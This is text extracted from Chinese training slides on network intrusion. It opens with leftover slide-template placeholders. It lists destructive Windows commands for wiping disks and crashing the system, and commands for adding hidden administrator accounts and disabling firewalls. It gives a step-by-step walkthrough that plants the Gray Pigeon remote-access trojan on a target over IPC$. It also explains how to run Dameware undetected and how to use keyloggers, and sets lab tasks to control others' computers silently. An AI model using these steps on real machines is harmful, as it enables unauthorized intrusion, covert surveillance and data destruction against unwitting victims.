网络安全攻防技术教程

Page,*,单击此处编辑母版标题样式,单击此处编辑母版文本样式,第二级,第三级,第四级,第五级,Version 2.0,单击此处编辑母版标题样式,单击此处编辑母版文本样式,第二级,第三级,第四级,第五级,单击此处编辑母版标题样式,单击此处编辑母版文本样式,第二级,第三级,第四级,第五级,Page,*,单击此处编辑母版标题样式,单击此处编辑母版文本样式,第二级,第三级,第四级,第五级,Page,*,单击此处编辑母版标题样式,单击此处编辑母版文本样式,第二级,第三级,第四级,第五级,Page,*,单击此处编辑母版标题样式,单击此处编辑母版文本样式,第二级,第三级,第四级,第五级,Page,*,单击此处编辑母版标题样式,单击此处编辑母版文本样式,第二级,第三级,第四级,第五级,Page,*,单击此处编辑母版标题样式,单击此处编辑母版文本样式,第二级,第三级,第四级,第五级,Page,*,单击此处编辑母版标题样式,单击此处编辑母版文本样式,第二级,第三级,第四级,第五级,Page,*,单击此处编辑母版标题样式,单击此处编辑母版文本样式,第二级,第三级,第四级,第五级,Page,*,单击此处编辑母版标题样式,单击此处编辑母版文本样式,第二级,第三级,第四级,第五级,Page,*,单击此处编辑母版标题样式,单击此处编辑母版文本样式,第二级,第三级,第四级,第五级,Page,*,网络入侵基础知识、入侵实战,第,2,章,李冰川,QQ,：,594520163,Email,：,Page,2,章节目标,常用的,DOS,命令,常用的入侵命令,Hack,实战一：命令行下的入侵,Hack,实战二：图形界面的入侵,流行远程控制木马的使用方法,键盘记录程序的使用方法,Page,3,常用,DOS,命令,1,Cd,切换目录,Dir,列出所有文件信息,Del,删除文件,Md,创建目录,Rd,删除目录,Copy,复制,Xcopy,复制文件和文件夹,Cls,清屏,Attrib,修改文件、文件夹属性,Date,、,Time,显示日期、时间,Page,4,常用,DOS,命令,2,Path,系统路径,Set,显示、设置系统信息,Ren(Rename),重命名,Subst,虚拟磁盘,Ver,显示操作系统版本,Help,帮助,/?,显示某条命令的帮助,Page,5,非主流,DOS,命令,1,1.,重复执行某条命令直至死机的批处理代码：,start cmd,%0,2.,复制一个文件的磁盘的每个子文件夹当中：,for /r /d %a in (*) do copy test.txt %a /y,3.,不停地执行同一条命令：,for /l %a in (1,0,2) do net send 192.168.1.1 ,炸弹来了！,4.,死机,蓝屏,ntsd -c q -pn winlogon.exe,ntsd -c q -pn csrss.exe,Page,6,非主流,DOS,命令,2,5.,删除磁盘所有文件：,del * /a /s /q /f,6.,创建名字为空的文件夹：,md (,按住,Alt,键，在小键盘上按,2,5,5,然后松开,Alt,回车,),7.,创建无法删除的特殊名字文件夹：,md .c:con,md .c:aux,8.,创建无法双击打开无法删除的另类文件夹：,md test.,rd test. /s /d,Page,7,常用入侵命令,1,net user,用户名 密码,/add (,建立用户,),net localgroup administrators,用户名 密码,/add (,将用户加到管理员，使其拥有管理权限,),net user guest /active:Yes (,激活,guest,用户,),net user guest 12345 (,修改,guest,密码为,12345),net user (,查看账号属性,),net use ipipc$ “” /user (,建立空,IPC,连接,),net use ipipc$ “,密码,” /user:“,用户名,” (,建立,IPC,非空连接，非空链接就是需要帐户和密码,),net use ipipc$ /del (,删除,IPC,空连接,),net use z: 127.0.0.1c$(,映射目标主机磁盘,c,盘到本地磁盘,Z,盘,),Page,8,常用入侵命令,2,net start (,查看开启了哪些服务,),net start,服务名,(,开启服务,),net time ,目标,IP (,查看对方时间,),net view (,查看局域网中开启了哪些共享,),net share (,查看本地开启的哪些共享,),net share C$/del (,删除,C,盘默认共享,),netstat -an (,查看计算机开放了哪些端口,),Copy xx.exeipadmin$System32 (,将当前,xx.exe,复制到对方,Admin$,共享的,System32,目录内,),Page,9,常用入侵命令,3,sc config tlnesvr start= auto(,修改,telnet,服务的启动方式为自动，,auto,前面有一个空格,),net stop sharedaccess(,关闭系统自带的防火墙,),net send IP,消息,(,利用,messenger,服务向目标,IP,发送消息,),ntsd -c q -pn winlogon.exe(,蓝屏重启,),ntsd -c q -pn csrss.exe(,死机,),tasklist(,查看进程,),taskkill(,结束进程,),Page,10,实战：纯,DOS,命令入侵,net use,192.168.2.20ipc$,“123” /user:”administrator”,net time,Copy c:server.exe,192.168.2.20admin$svchost.exe,At 12:00 start c:windowssvchost.exe,这样，对方就中了灰鸽子服务端了。,Page,11,几个小例子,开启禁用的,telnet,服务：,sc config tlntsvr start= auto(auto,前有空格,),开启,3389,远程终端,reg add,开启,C,盘默认共享,net share c$=c:,开启计划任务服务（,at,命令需要这一服务）,net start schedule,开启远程注册表,(Remote Registry),服务,net start remoteregistry,Page,12,图形界面入侵,一、计算机管理,操作菜单,连接到另一台计算机,二、注册表编辑器,文件菜单,连接网络注册表,三、第三方工具比如,Dameware,、,Pcanywhere,Dameware,的使用方法,Page,13,Dameware,的隐藏,用,Dameware,控制对方，要做到悄无声息，需要注意以下几点：,点帮助菜单,激活软件，输入注册码注册软件；,在远程连接对话框上单击“设置”，勾选：,“查看模式”和“显示远程鼠标指针”；,切换到“安装选项”选项卡，勾选上“复制配置文件”然后点“编辑”：,把“附加设置”选项卡上“允许托盘图标”勾掉,再把“通知对话”选项卡上“连接时通知”勾掉。,Page,14,XP,默认不能远程控制的原因,在运行中输入命令,secpol.msc,打开安全策略,展开“本地策略”,“,安全选项”,(,红色表示默认选项,),“,安全选项：本地账户的共享和安全模式”,经典，表示在远程可以拥有管理员权限,仅来宾，表示在远程只能拥有,guest,权限,“账户：使用空白密码的账户只允许进行控制台登录”,启用，账户密码为空则不允许远程访问,禁用，账户密码为空也允许远程访问,所以，要想控制系统为,XP,的计算机，必须考虑对方安全策略的设置,安全策略的设置不影响利用木马进行控制,Page,15,灰鸽子,以华夏灰鸽子,2009,为例，注意事项：,IP,地址栏一定要填写自己的,IP,地址，而且不要忘了加上冒号和端口号,Page,16,PcShare,使用方法和灰鸽子类似,Page,17,键盘记录,以“,keyghost”,和“简单键盘记录程序”为例,Page,18,实验任务,练习前面,PPT,中的,DOS,命令,开一台,2003,虚拟机，利用命令入侵，以,能够,telnet,到对方电脑,为入侵成功的标志,开一台,2003,虚拟机，利用图形界面入侵，以,能够控制对方桌面,为入侵成功的标志,使用远控软件,Dameware,控制别人电脑,（要求：悄无声息，不能被对方发现）,利用灰鸽子控制别人电脑,